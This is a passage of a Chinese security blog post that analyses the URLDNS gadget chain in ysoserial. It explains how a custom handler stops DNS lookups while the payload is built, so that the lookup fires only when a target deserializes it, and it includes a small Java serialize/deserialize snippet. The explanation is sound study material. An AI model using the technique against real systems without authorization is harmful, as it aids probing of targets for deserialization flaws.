class="string">&quot;out.bin&quot;</span>));</span><br><span class="line">    oos.writeObject(hashMap);</span><br><span class="line">    <span class="comment">// 反序列化</span></span><br><span class="line">    ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(<span class="string">&quot;out.bin&quot;</span>));</span><br><span class="line">    ois.readObject();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="URLDNS分析"><a href="#URLDNS分析" class="headerlink" title="URLDNS分析"></a>URLDNS分析</h2><p>看下ysoserial的URLDNS</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211223010644838.png" alt="image-20211223010644838"></p>
<p>URL类默认的handler类型为URLStreamHandler</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211223011746284.png" alt="image-20211223011746284"></p>
<p>正是URLStreamHandler的getHostAddress方法执行了dns请求，ysoserial的URLDNS在构造序列化数据时将URL.handle设置为自定义的handle，即SilentURLStreamHandler，使hashmap.put触发的handle.getHostAddress方法不执行dns操作，最终达到序列化数据构造过程中不产生dns请求的效果。</p>
<p>同时由于序列化和反序列化只记录类的属性，而不管函数内容，所以反序列化时hashmap.put触发的handle.getHostAddress为URL类默认的URLStreamHandler类型的handle属性的getHostAddress方法，会触发dns请求。</p>
<h1 id="参考文档"><a href="#参考文档" class="headerlink" title="参考文档"></a>参考文档</h1><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/229108">https://www.anquanke.com/post/id/229108</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/panchanggui/p/9952509.html">https://www.cnblogs.com/panchanggui/p/9952509.html</a><br><a target="_blank" rel="noopener" href="https://bkfish.gitee.io/2020/05/29/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A83-ysoserial%E8%B0%83%E8%AF%95%E5%92%8C%E6%9E%84%E9%80%A0URLDNS%E7%9A%84pop%E9%93%BE/">https://bkfish.gitee.io/2020/05/29/java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%85%A5%E9%97%A83-ysoserial%E8%B0%83%E8%AF%95%E5%92%8C%E6%9E%84%E9%80%A0URLDNS%E7%9A%84pop%E9%93%BE/</a></p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">mlccs</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://mlccs.github.io/2021/12/23/Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80/">https://mlccs.github.io/2021/12/23/Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80/</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mlccs.github.io">!>-_-<!</a>！</span></div></div></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2021/12/30/Transform%E9%93%BE%E5%88%86%E6%9E%90/"><i class="fas fa-angle-left">&nbsp;</i><span>Transform链分析</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2021/12/22/java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9F%BA%E7%A1%80%C2%B7%E4%B8%80/"><span>反序列化攻击基础·一</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="copyright">&copy;2021 ～ 2022 By mlccs</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>